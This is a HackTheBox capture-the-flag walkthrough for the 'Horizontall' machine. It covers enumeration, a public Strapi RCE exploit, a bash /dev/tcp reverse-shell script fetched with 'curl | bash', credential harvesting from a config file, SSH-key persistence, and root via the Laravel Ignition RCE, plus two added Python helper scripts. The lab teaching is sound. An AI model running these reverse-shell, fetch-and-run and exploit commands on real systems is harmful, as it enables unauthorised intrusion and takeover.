Horizontall HackTheBox WalkThrough

This is the Horizontall HackTheBox machine walkthrough. In this writeup I show step by step how I rooted the Horizontall machine. Before starting, a few facts about the box: it is a Linux machine, and its maker rated it difficulty level easy.

First of all, connect your PC to the HackTheBox VPN and confirm connectivity with the Horizontall machine by pinging its IP. If all goes well, it is time to start hacking.

As usual, I started by scanning the machine. Scanning tells us how to proceed: it grabs the banners of the services running on the open ports, and sometimes the default scripts also point at vulnerabilities. I used $ nmap (a popular port scanner) for this task; the result is given below:


$ sudo nmap -sC -sV -p- -oN full-port.nmap
Nmap scan result during Horizontall HackTheBox WalkThrough

The full port scan with nmap revealed ports 22 and 80 as open: OpenSSH 7.6p1 on port 22 and nginx 1.14.0 on port 80. Googling for vulnerabilities in these OpenSSH and nginx versions turned up nothing useful. The nmap http-title script also revealed the virtual host name horizontall.htb, so before any further enumeration let us add horizontall.htb to our hosts file, /etc/hosts.

Hosts File After Modification 1

$ cat /etc/hosts
Hosts File after modification 1

Visiting http://horizontall.htb/ gave a simple UI saying "Build website using HT". Checking the page source and the rest of the site turned up nothing useful.

Horizontall htb box web page

So I moved on to directory and virtual-host brute forcing. Directory brute forcing with $ dirsearch and the wordlist directory-list-2.3-medium.txt found no useful file or folder, but virtual-host brute forcing with $ ffuf and the wordlist subdomains-top1million-110000.txt found the virtual host api-prod.horizontall.htb. One caveat with the command below: -mc 200 only keeps responses with status 200, and if the default nginx server answers 200 with the same page for every Host value, every candidate will match. In that case note the size of that baseline response and filter it out with -fs <size> (or -fw / -fl for word and line counts) so that only differing responses such as api-prod remain.

$ ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb -H "Host: FUZZ.horizontall.htb" -mc 200 -c
Vhost bruteforcing on Horizontall machine during Horizontall HackTheBox WalkThrough
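To make the filtering step explicit, here is the same virtual-host discovery written in Python. This is an added example, not the page's own tooling or part of ffuf: it requests the target with a custom Host header, records a baseline response for a hostname that cannot exist, and reports only candidates whose (status, length) differs from that baseline, which is what ffuf's -fs does. The base URL, domain, wordlist path and the sample sizes in the test are assumptions, and the probe function is injected so the logic can be exercised offline.

```python
"""Virtual-host discovery with a wildcard baseline filter.

Added example for this walkthrough; not the page's code. Assumes the target
serves a default page for unknown Host values, so candidates are compared
against a baseline response rather than matched on status 200 alone.
"""
import secrets
import sys
import urllib.error
import urllib.request


def http_probe(base_url, host, timeout=5):
    """GET base_url with an overridden Host header; return (status, body length)."""
    req = urllib.request.Request(
        base_url, headers={"Host": host, "User-Agent": "vhost-probe"}
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:
        # 4xx/5xx answers are still useful signal, so keep status and size.
        return err.code, len(err.read())


def find_vhosts(probe, domain, words):
    """probe(host) -> (status, length). Return [(host, (status, length)), ...]
    for every candidate whose response differs from the wildcard baseline."""
    # A random label that no real vhost will have gives the default-server answer.
    baseline = probe(f"{secrets.token_hex(6)}.{domain}")
    found = []
    for word in words:
        host = f"{word}.{domain}"
        result = probe(host)
        if result != baseline:
            found.append((host, result))
    return found


if __name__ == "__main__":
    # usage: python3 vhost.py http://horizontall.htb horizontall.htb wordlist.txt
    url, domain, wordlist = sys.argv[1:4]
    with open(wordlist) as fh:
        words = [line.strip() for line in fh if line.strip()]
    for host, (status, size) in find_vhosts(lambda h: http_probe(url, h), domain, words):
        print(f"{host}\t{status}\t{size}")
```

Because the baseline is taken per run, the filter also survives the case where the default page changes size between engagements; the price is that a real vhost whose page happens to be byte-identical to the default one is invisible, which is the same blind spot ffuf -fs has.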

Let us add api-prod.horizontall.htb to our hosts file.

Hosts File After Modification 2

$ cat /etc/hosts
Hosts file after modification 2

Going to http://api-prod.horizontall.htb/ showed a simple page containing only "Welcome".

Api-pro-horizontall-htb web page

Then I directory brute forced this subdomain using $ dirsearch and the wordlist directory-list-2.3-medium.txt.

$ sudo dirsearch -u http://api-prod.horizontall.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e all -x 404,403,301,303 -t 100
Directory bruteforcing result during Horizontall HackTheBox WalkThrough

Directory brute forcing revealed the admin and reviews paths. Going to http://api-prod.horizontall.htb/admin/ showed the login page of the Strapi CMS.

STRapi Login page

Then I googled for how to find the version of Strapi in use and which vulnerabilities affect it. Luckily I got this link, which shows that Strapi exposes its version at the unauthenticated path /admin/strapiVersion. Requesting http://api-prod.horizontall.htb/admin/strapiVersion showed that the installed version is 3.0.0-beta.17.4.

Strapi Version found during Horizontall HackTheBox WalkThrough

A quick search for Strapi vulnerabilities revealed that version 3.0.0-beta.17.4 is vulnerable to unauthenticated remote code execution and that a public exploit exists; check this link on exploit-db. The exploit chains two issues: an unauthenticated admin password reset (CVE-2019-18818, fixed in 3.0.0-beta.17.5) and an authenticated command injection in the plugin installer (CVE-2019-19609, fixed in 3.0.0-beta.17.8). Together they give code execution without knowing any credential.

Tip: whenever you obtain a software or framework version during the enumeration phase of a CTF, check it for known vulnerabilities right away.

StrAPI CMS Remote Code Execution exploit on exploit-db
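The version check above is worth automating, because Strapi's prerelease strings ("3.0.0-beta.17.4") do not compare correctly as plain strings or as floats. The following is an added example, not code from the page or from Strapi or exploit-db: it parses a version in that format with semver-style prerelease ordering and reports which of the two chained issues it predates. It assumes the /admin/strapiVersion body is JSON of the form {"strapiVersion": "..."} (the key name is an assumption), and the embedded sample body is constructed.

```python
"""Compare a Strapi version string against the fixes for the two issues the
unauthenticated RCE exploit chains. Added example for this walkthrough.

Fixed versions: CVE-2019-18818 (admin password reset) in 3.0.0-beta.17.5,
CVE-2019-19609 (command injection in plugin install) in 3.0.0-beta.17.8.
"""
import json
import re

FIXES = {
    "CVE-2019-18818 (unauthenticated admin password reset)": "3.0.0-beta.17.5",
    "CVE-2019-19609 (command injection via plugin install)": "3.0.0-beta.17.8",
}

# Constructed sample of what /admin/strapiVersion is assumed to return.
SAMPLE = '{"strapiVersion":"3.0.0-beta.17.4"}'

_VERSION_RE = re.compile(r"v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.]+))?")


def parse_version(text):
    """'3.0.0-beta.17.4' -> ((3, 0, 0), ('beta', 17, 4)); a plain release has ()."""
    m = _VERSION_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    core = tuple(int(x) for x in m.group(1, 2, 3))
    pre = ()
    if m.group(4):
        # Numeric identifiers become ints so 17 < 17.5 style ordering works.
        pre = tuple(int(p) if p.isdigit() else p for p in m.group(4).split("."))
    return core, pre


def _cmp(a, b):
    return (a > b) - (a < b)


def compare(a, b):
    """Return -1, 0 or 1 like a semver comparison of a against b."""
    core_a, pre_a = parse_version(a)
    core_b, pre_b = parse_version(b)
    if core_a != core_b:
        return _cmp(core_a, core_b)
    if pre_a == pre_b:
        return 0
    if not pre_a:          # a release outranks any prerelease of the same core
        return 1
    if not pre_b:
        return -1
    for ia, ib in zip(pre_a, pre_b):
        if ia == ib:
            continue
        if isinstance(ia, int) and isinstance(ib, int):
            return _cmp(ia, ib)
        if isinstance(ia, int):   # numeric identifiers sort before alphanumeric
            return -1
        if isinstance(ib, int):
            return 1
        return _cmp(ia, ib)
    # All shared identifiers equal: the longer prerelease is the later one.
    return _cmp(len(pre_a), len(pre_b))


def vulnerable_to(version):
    """List the issues whose fix is newer than the installed version."""
    return [name for name, fixed in FIXES.items() if compare(version, fixed) < 0]


def assess(body):
    """Take the raw /admin/strapiVersion body; return (version, list of issues)."""
    version = json.loads(body)["strapiVersion"]
    return version, vulnerable_to(version)


if __name__ == "__main__":
    found, issues = assess(SAMPLE)
    print(found, "->", issues or "no known issue from this list")
```

Running it on a live target is one extra line (fetch the URL and pass the body to assess); keeping the network call out of the module is what makes the ordering logic testable offline.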

Confirming RCE

To confirm remote code execution on the Horizontall machine, follow the steps below.

$ wget https://www.exploit-db.com/download/50239 -O exploit.py
$ python3 exploit.py http://api-prod.horizontall.htb
$> whoami

After successful exploitation we get an authenticated JSON Web Token and the credential admin : SuperStrongPassword1. Note that the exploit resets the admin password to this value, so the change is visible to anyone else working on the box.

Running Strapi CMS exploit on api-prod-horizontall vhost

We can use this credential to log in at http://api-prod.horizontall.htb/admin/. The RCE is blind, so the output of whoami is not shown on screen; the screenshot above confirms this.

Checking Connectivity with Kali Machine

To confirm that we can get a reverse shell on our Kali machine, we need to check that the Horizontall machine can reach it. I started tcpdump on Kali, pinged my Kali box from the Horizontall machine through the blind RCE, and the ICMP echo requests arrived.

$> ping -c 3
$ sudo tcpdump -i tun0 icmp
Checking connectivity with our Kali machine through horizontall machine

Now it is time to get a reverse shell using a one-liner. You can get a list of one-liners from this link.

Getting User Shell

To get a reverse shell, follow the given steps:

On Kali Machine

In window 1
$ echo '#!/usr/bin/bash'>shell.sh
$ echo 'bash -i >& /dev/tcp/ 0>&1'>>shell.sh # Don’t forget to replace the IP with your Kali machine IP
$ cat shell.sh
$ sudo python3 -m http.server 80
In window 2
$ nc -nvlp 9001 # listener; the port must match the one used in shell.sh
$ whoami && id # run inside the reverse shell once it connects

On Horizontall Machine

$> curl | bash
Getting user shell during Horizontall HackTheBox WalkThrough

We have successfully got a user shell. Let us upgrade it to a fully interactive TTY so that we can run more advanced commands, including tools such as su and ssh that refuse to work without a terminal.

Upgrading Shell

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
$ CTRL + Z # background the shell
$ stty raw -echo
$ fg # then press Enter once or twice to bring the shell back to the foreground
$ export TERM=xterm-256color
$ stty -a | head -n1 # run in a local Kali terminal to read your own rows and columns
$ stty rows 43 columns 174 # set the same values inside the reverse shell
Shell upgrade during Horizontall HackTheBox WalkThrough

Capture User Flag

$ cat /home/developer/user.txt
Capture user flag during Horizontall HackTheBox WalkThrough

Privilege Escalation

To escalate privileges to root we first need a privilege-escalation vector. We can find one manually or with post-exploitation enumeration scripts such as linpeas.sh and LinEnum.sh, among many others. This time I went for manual enumeration.

Finding PrivEsc Vector

The $ ss -lnpt command revealed that ports 3306, 1337 and 8000 are listening on localhost only, so there must be services running over them that are not reachable from outside the box.

ss -lnpt output

A MySQL server is running on port 3306. I logged into it using the credential developer : #J!:F9Zt2uI, which I got from the file database.json in the directory /opt/strapi/myapi/config/environments/development/. But there was no useful information in the databases.

database.json file content found during Horizontall HackTheBox WalkThrough

When I tried to access port 1337 it did not respond. Accessing the service on port 8000 through its URL showed that the application running there is built on Laravel v8.

$ curl | grep -A3 -B4 -i "Laravel v8"
Result of curl command on horizontall htb box

As soon as I had the Laravel version, I searched for vulnerabilities and exploits. Laravel up to v8.4.2 (more precisely, the bundled Ignition error page before version 2.5.2) is vulnerable to remote code execution when debug mode is enabled; for details see CVE-2021-3129. The exploit at this URL downloads the phpggc gadget-chain library from GitHub while it runs, so it must run on a machine with Internet access. HackTheBox targets have no outbound Internet, and the vulnerable service on port 8000 listens only on localhost of the target, so we run the exploit from our Kali machine and forward the target's port 8000 to Kali with a local port forward. Check the fifth-from-last line of code in the screenshot below.

Exploit code

We will use SSH for the local port forward. We do not have any SSH credentials yet, so we need to create some.

Since we have a shell as the strapi user, we can add our SSH public key (id_rsa.pub) to that user's authorized_keys file and then connect to Horizontall as strapi with the matching private key (id_rsa). So let us create an RSA key pair with $ ssh-keygen.

On Kali Machine

$ ssh-keygen
$ cat ~/.ssh/id_rsa.pub
SSH-Keygen command result on my Kali machine during Horizontall HackTheBox WalkThrough

On Horizontall Machine

$ pwd # /opt/strapi, the home directory of the strapi user, is where authorized_keys must live
$ mkdir .ssh
$ echo "ssh-rsa <contents of your id_rsa.pub> deepak@kali" > /opt/strapi/.ssh/authorized_keys
$ chmod 700 .ssh && chmod 600 .ssh/authorized_keys # sshd (StrictModes, the default) ignores keys in group- or world-writable paths
$ cat /opt/strapi/.ssh/authorized_keys
Adding id_rsa.pub key to strapi user

Our public key is now in the authorized_keys file of user strapi on Horizontall.

Local Port Forwarding

Let us log in to the strapi account with our id_rsa key and forward port 8000 of Horizontall to port 8000 on our Kali machine.

$ chmod 400 ~/.ssh/id_rsa
$ ssh -i ~/.ssh/id_rsa -L 8000:127.0.0.1:8000 strapi@<horizontall IP> # -L <local port>:<host as seen from the target>:<target port>

We can check the forwarded port with $ ss -lnpt on Kali; it should now show port 8000 listening on 127.0.0.1.

Local Port Forwarding during Horizontall HackTheBox WalkThrough

Now we can reach the service running on port 8000 of Horizontall through port 8000 on our Kali machine, at http://localhost:8000/.

Localhost service running on port 8000

Running the CVE-2021-3129 exploit against the forwarded port gave command execution straight away, and because the Laravel application runs as root, that is our privilege-escalation vector: a vulnerable software version reachable only from localhost.

Getting Root by Privilege Escalation

To perform the privilege escalation, follow the steps at this URL or the steps below. They run on Kali, against the SSH port forward.

$ git clone https://github.com/nth347/CVE-2021-3129_exploit.git
$ cd CVE-2021-3129_exploit
$ chmod +x exploit.py
$ ./exploit.py http://localhost:8000 Monolog/RCE1 id
Privilege Escalation on Horizontall HTB machine during Horizontall HackTheBox WalkThrough

The output of $ id is

uid=0(root) gid=0(root) groups=0(root)

so the commands run as root: the Laravel application on port 8000 was started as root, and the RCE inherits that privilege.

Capture Root Flag

Let us capture root flag.

$ ./exploit.py http://localhost:8000 Monolog/RCE1 'cat /root/root.txt'
Capture Root flag during Horizontall HackTheBox WalkThrough

This was how I rooted the Horizontall HackTheBox machine. I learnt a lot from this challenge and hope you learnt something new too. Thanks for reading this walkthrough. For any query or suggestion about the walkthrough, feel free to write to us at [email protected]


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec consultant by day and a bug bounty hunter and CTF player by night. I sometimes write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/